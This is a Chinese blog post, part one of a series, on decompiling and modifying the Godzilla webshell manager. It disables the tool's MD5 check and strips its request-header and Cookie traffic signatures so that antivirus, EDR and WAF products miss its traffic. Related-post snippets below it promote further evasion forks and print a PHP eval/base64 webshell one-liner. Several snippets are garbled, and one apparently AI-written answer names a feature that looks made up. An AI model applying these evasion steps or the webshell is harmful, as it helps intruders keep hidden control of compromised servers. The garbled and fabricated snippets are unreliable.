【工具二开】魔改哥斯拉(一)

已于 2025-01-05 10:09:21 修改
阅读量650 收藏 7
点赞数 4
文章标签: web安全 网络安全 java php idea
于 2025-01-04 20:51:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ggqiuhui/article/details/144934675
版权

二开哥斯拉,内容如下:

  • 修改请求头特征字段

  • 去除Cookie后面的分号特征

  • 修改响应体特征

  • 修改请求体特征

  • 更改数据交互方式

  • 更改加密方式

  • 更改加载器

  • 其它免杀处理

  • ...... 

准备工作

一、首先下载原工具jar包,进行反编译

项目下载地址:

https://github.com/BeichenDream/Godzilla/releases/tag/v4.0.1-godzilla

图片

下载下来后进行反编译,两种方式:

1、IDEA工具插件

java -cp "D:\Program Files\JetBrains\IntelliJ IDEA Community Edition 2023.1.2\plugins\java-decompiler\lib\java-decompiler.jar" org.jetbrains.java.decompiler.main.decompiler.ConsoleDecompiler -dgs=true godzilla.jar godzilla_de

2、在线平台

https://www.decompiler.com

这里使用第一种方式IDEA工具插件进行反编译

反编译好,得到一个jar包

给它解压出来就是我们的源码目录,至此反编译工作完成

图片

二、搭建二开环境

这里使用IDEA,新建项目

图片

并将刚才解压的源码复制到项目中,新建lib目录,将哥斯拉jar包和运行生成的db文件放进去

图片

接着,配置项目结构:

1、模块,添加lib中的原工具jar包

图片

2、添加工件,JAR,找主类MainActivity(core.ui)

图片

图片

应用确认之后,二开环境搭建完毕!

二开说明

1、我的环境:哥斯拉V4.01、IDEA、JDK1.8、phpStudy、tomcat、IIS

2、我们只需要把源码中想改的部分,复制到src目录修改代码后,重新打包即可

3、哥斯拉二开,有个MD5校验的问题要提前解决,否则编译之后新的jar你是运行不了的

解决步骤:在源码中查找提示的关键字“你使用的软件”,找到对应文件的路径,复制到src目录下注释校验代码即可

图片

编译运行测试,可正常打开,此问题已解决

修改请求头特征字段

请求头3个特征字段

图片

根据关键字找到文件,和上面同样的操作,直接修改代码

打包编译,运行测试

抓包看看,没问题!

去除Cookie后面的分号特征


哥斯拉Cookie特征

源码中搜一下关键字,找到代码文件HttpResponse.java

代码逻辑很简单,可借助如今摧枯拉朽的伟大技术——人工智能ChatGPT

去除以下问题代码即可

sb.append(String.format(" %s=%s;", cookie.getName(), cookie.getValue()));

测试如图,分号已去除

至此,请求头特征已经去除干净!

未完待续

仇辉攻防
关注
[]_哥斯拉-PHP流量特征修
qq_52579508的博客
05-09 1398
. 说明哥斯拉的流量特征很容易就会被杀软、EDR识别,修哥斯拉的流量特征可以绕过EDR等杀毒软件。本次哥斯拉4.0.1。原版地址:https://github.com/BeichenDream/Godzilla/releases/tag/v4.0.1-godzilla环境:IDEAJAVA1.8. 反编译反编译有三种方式。在线反编译:https://www.decompiler.co...
哥斯拉webshell免杀
2202_75361164的博客
11-28 570
许多师傅提出市面上net webshell免杀工具较少,想隐匿流量却对默认生成的shell不会免杀,这里首先更新下net的生成即免杀以及随机html(后续推出其他语言的免杀)注:使用版本生成的webshell,用普通版本的哥斯拉是连不上的(选项中需要选择版本模式进行连接)直接生成webshell再用网上的工具或者自己的免杀方法进行免杀(后续可能会提供键免杀的功能)这里注意:尽量不要用默认密码密钥,安天的引擎只要你输入pass和key就报红。2.去除响应包中md5前后16位匹配强特征。
Godzilla 和 冰蝎的流量特征对比
sinat_29173481的博客
03-17 915
数据,避免明文传输特征数据。Godzilla 主要使用。,其流量更加难以直接检测。如果你想更深入了解如何。冰蝎的核心特点是使用。
工具哥斯拉
仇辉攻防的博客
01-04 532
工具/webshell工具/哥斯拉/哥斯拉
【免杀】-哥斯拉(入门)
qq_55349490的博客
06-04 3859
我们都知道哥斯拉默认生成的shell是很容易被安全软件检测出来的。所以我们需要修shell生成逻辑,以达到免杀。除了修指纹外,我们还需要修数据包的加密方式,以及生成的shell以实现免杀的效果。我们知道,哥斯拉强大之处就在于它的插件功能。插件我们也可以尝试自己放插件。分析多个流量包可以发现哥斯拉有3个强特征。尝试搜索关键词搜索不到,发现是。
探秘Z-Godzilla_ekp:哥斯拉Webshell的超强
gitblog_00023的博客
05-30 768
探秘Z-Godzilla_ekp:哥斯拉Webshell的超强版 去发现同类优质源项目:https://gitcode.com/ 项目介绍 Z-Godzilla_ekp是个针对哥斯拉webshell的深度发项目,旨在帮助网络安全专家们绕过流量检测设备,实现更隐蔽、更安全的远程控制。这个源项目不仅提供了phpjava、net三种语言的流量修支持,还计划集成键免杀功能和各种实用插...
哥斯拉webshell管理工具秒过流量检测设备
Fly_鹏程万里
06-18 627
哥斯拉Webshell管理工具发规避流量检测设备,目前测了国内两安全厂商的态感,连接和执行命令无告警,java,net,php 流量修已经全部支持,以后还会集成键免杀功能和些插件 觉得好用的师傅点点star~(更新的动力!!!
实战分析某红队哥斯拉Webshell
热门推荐
include_voidmain的博客
05-31 1万+
声明 以下内容,来自先知社区的ga0weI作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。 0x01 前言 前两天从某次演习中拿到了webshell样本,该webshell通信未产生相关任何告警,因此该样本在免杀以及bypass相关waf和ids设备上是非常值得学习的。 分析过程中不难发现其实这个就是的Godzilla,其的思路比较出奇,并且其免杀做的很到位。 为什么说这个webshell是的哥斯
Z-Godzilla_ekp -哥斯拉webshell管理工具发规避流量检测设备
seoppg的博客
06-13 660
许多师傅提出市面上net webshell免杀工具较少,想隐匿流量却对默认生成的shell不会免杀,这里首先更新下net的生成即免杀以及随机html(后续推出其他语言的免杀,最近很多攻防,还有学校的考试课,太忙了,师傅们体谅下)生成webshell选择bypass1(尽量不要用默认密码密钥,安天的引擎只要你输入pass和key就报红,aspx的马报jspwebshell就很离谱。php 流量修已经全部支持,以后还会集成键免杀功能和些插件 觉得好用的师傅点点star~(更新的动力!
剖析哥斯拉WebShell管理工具
Rockboy777的博客
09-15 643
本篇主要分析哥斯拉工具生成以及方面的内容。
Web安全-Godzilla(哥斯拉Webshell管理工具使用
Boom!脑洞大爆炸的博客
07-03 6884
Web安全-Godzilla(哥斯拉Webshell管理工具使用
攻击工具分析:哥斯拉(Godzilla)1
08-03
介绍的也差不多了,我们来分析看看他到底强在哪。加密模块分析分析脚本类型:PHP_XOR_base64具版本:3.031. 先进反编译,加密代码的位置位于:”sh
Godzilla:哥斯拉
03-17
哥斯拉 运行环境 JavaDynamicPayload-> jre5及以上 CShapDynamicPayload-> .net2.0及以上 PhpDynamicPayload-> php5.0及以上 简介 有效载荷以及加密器支持 哥斯拉内置了3种有效载荷以及6种加密器,6种支持脚本后缀,20个内置插件 JavaDynamicPayload JAVA_AES_BASE64 jsp jspx JAVA_AES_RAW jsp jspx CShapDynamicPayload CSHAP_AES_BASE64 aspx 阿姆斯 阿什克斯 JAVA_AES_RAW aspx 阿姆斯 阿什克斯 PhpDynamic有效载荷 PHP_XOR_BASE64 PHP PHP_XOR_RAW PHP Raw或Base64加密器区别 Raw:将加密后的数据直接发送或输出 Base
kingkong:解密哥斯拉webshell管理工具流量
04-16
kingkong 解密哥斯拉Godzilla-V2.96 webshell管理工具流量 目前只支持jsp类型的webshell流量解密 Usage 获取攻击者上传到服务器的webshell样本 获取wireshark之类的流量包,般甲方有科来之类的全流量镜像设备,联系运维人员获取,这里以test.papng为例。 导出所有http对象,放置到文件夹 编辑kingkong.py脚本,找到#config这行,配置获取到的样本password、key,以及刚才的文件夹路径 py -2 kingkong.py Config #config #配置webshell的key key = '3c6e0b8a9c15224a' #配置webshell的password password = 'pass' #配置wireshark导出http对象的路径 filepath = '.' #配置是否为jsp+b
Godzilla
10-25
Godzilla
攻击工具分析:哥斯拉(Godzilla)
wangluoanquan111的博客
08-19 2078
对,你没有看错,本期我们要研究的目标是哥斯拉。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oafeRjkq-1692333362279)(https://image.3001.net/images/20210709/1625812505_60e7ee19253ce63efdfc1.png!small)]不过,此哥斯拉非彼哥斯拉,他是继菜刀、蚁剑、冰蝎之后具有更多优点的Webshell管理工具,由java语言发,如名称样,他的“凶猛”之处主要体现在:
工具哥斯拉(三)
仇辉攻防的博客
01-04 368
工具/webshell工具/哥斯拉/哥斯拉
渗透干货分享:从0到1哥斯拉项目反编译初步搭建
xnxqwzy的博客
08-01 1333
今天上github搜索哥斯拉项目时,看到了有人发布了哥斯拉源码的项目。最初以为是哥斯拉作者发布了项目源码,点进这个项目看,原来是反编译构建的哥斯拉源码。于是心血来潮,决定也对该哥斯拉3.0.3版本,也就是哥斯拉作者发布的最新版本进行反编译生成可运行的项目。0x02 构建pom.xml此次使用的环境:。项目地址如下:下载最新版的v3.0.3-godzilla将下载后的文件用jd-gui打
29-3 哥斯拉安装使用
weixin_43263566的博客
03-22 1557
哥斯拉个基于流量、HTTP全加密的webshell管理工具,具有以下特点:在服务端支持open_ssl时,"冰蝎"使用AES加密算法,密钥长度为16位,也可称为AES-16。这种加密方式在软件及硬件上都能快速地进行加解密,内存需求低,非常适合用于流量加密。下载地址:GitHub - BeichenDream/Godzilla: 哥斯拉
哥斯拉运行不了stoaway
最新发布
03-27
### 哥斯拉 Stoaway 运行故障解决方案 哥斯拉款流行的 Webshell 管理工具,其通过特定协议与服务器端的 Webshell 进行通信。然而,在实际使用过程中可能会遇到运行故障的情况。以下是针对 **Stoaway** 功能可能出现的运行故障及其解决方案: #### 1. 配置问题 如果在连接过程中出现问题,可能是因为配置文件未正确设置。确保客户端和服务器端的参数致,尤其是加密密钥、路径以及模式选择部分。 - 如果使用的是版本,则需要确认是否选择了对应的模式[^2]。 - 客户端和服务端之间的加密算法需匹配,否则可能导致无法正常通信。 #### 2. 流量特征引发拦截 哥斯拉的流量可能存在些明显的特征,例如 Cookie 中的分号或者请求体中的特殊字段[^3]。这些特征容易被安全设备识别并阻断。为了规避此类问题: - 可尝试调整请求头的内容,移除不必要的标志位。 - 使用更隐蔽的数据传输方式,比如 POST 请求隐藏数据于 body 或者 URL 参数中。 #### 3. Shell 被查杀或失效 即使成功上传了 Webshell 文件,也可能因防护软件的存在而被删除或禁用。此时建议采用内存加载技术来绕过静态扫描机制[^4]。具体方法如下: ```bash # 利用 PHP 的 eval 和 base64_decode 实现动态解码执行 <?php @eval(base64_decode($_POST['cmd'])); ?> ``` #### 4. 版本兼容性 不同版本之间可能存在功能差异,特别是官方版与发版之间。当使用某个特定功能(如 Stoaway)时,请务必验证当前所使用的客户端和服务端均为同分支下的最新稳定版本。 --- ### 示例代码片段 以下是个简单的测试脚本用于检查基本连接状态: ```python import requests url = "http://target.com/shell.php" data = {"password": "your_password", "action": "test"} headers = { "User-Agent": "Mozilla/5.0", } response = requests.post(url, data=data, headers=headers) if response.status_code == 200 and "success" in response.text: print("[+] Connection successful!") else: print("[-] Failed to connect.") ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值